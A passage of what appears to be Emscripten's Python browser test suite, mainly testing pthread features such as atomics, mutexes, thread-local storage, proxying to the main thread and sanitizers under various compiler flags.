'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
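  # Assumed shape of the try-join pattern referenced above (the real logic lives
  # in main_thread_join.cpp behind -DTRY_JOIN; this sketch is illustrative only
  # and is not run by the suite):
  def example_tryjoin_source(self):
    create_file('example_tryjoin.c', r'''
      #define _GNU_SOURCE
      #include <pthread.h>
      static void *thread_main(void *arg) { return 0; }
      int main() {
        pthread_t t;
        pthread_create(&t, 0, thread_main, 0);
        // tryjoin never blocks, so it is allowed on the main thread even with
        // ALLOW_BLOCKING_ON_MAIN_THREAD=0; poll until the thread has finished.
        while (pthread_tryjoin_np(t, 0) != 0) {}
        return 0;
      }
    ''')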
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
  # Tests the remaining GCC atomics not covered by the tests above.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
    # TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
  # Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
    self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
    self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
    self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
  # It is common for code to flip volatile global vars for thread control. This is a bit lax, but
  # nevertheless, test whether that kind of scheme will work with Emscripten as well (a sketch of
  # the pattern follows this test).
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
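  # A sketch of the volatile-flag scheme the test above exercises (assumed
  # shape; the real source lives in test_pthread_volatile.cpp, and the runner
  # ignores this non-test_ method):
  def example_volatile_flag_source(self):
    create_file('example_volatile_flag.c', r'''
      #include <pthread.h>
      volatile int flag = 0;
      static void *thread_main(void *arg) {
        flag = 1; // flip the flag from the worker thread
        return 0;
      }
      int main() {
        pthread_t t;
        pthread_create(&t, 0, thread_main, 0);
        while (!flag) {} // busy-wait on the volatile global
        pthread_join(t, 0);
        return 0;
      }
    ''')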
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
    # Test that it is possible to define a "Module.locateFile" callback that returns a path prefix, to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
  # Test that no deadlock occurs if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread).
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
  # Test the emscripten_futex_wake(addr, INT_MAX) functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
  # Test that real `thread_local` works (a sketch of the pattern follows this test).
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
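  # Assumed shape of the thread_local usage covered above (illustrative only;
  # the real source lives in test_pthread_tls.cpp, and the runner ignores this
  # non-test_ method):
  def example_thread_local_source(self):
    create_file('example_tls.cpp', r'''
      #include <thread>
      thread_local int counter = 1337; // each thread gets its own copy
      int main() {
        int seen = 0;
        std::thread([&] { seen = counter; }).join();
        return seen == 1337 ? 0 : 1;
      }
    ''')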
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler registered via signal(SIGALRM, func)
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
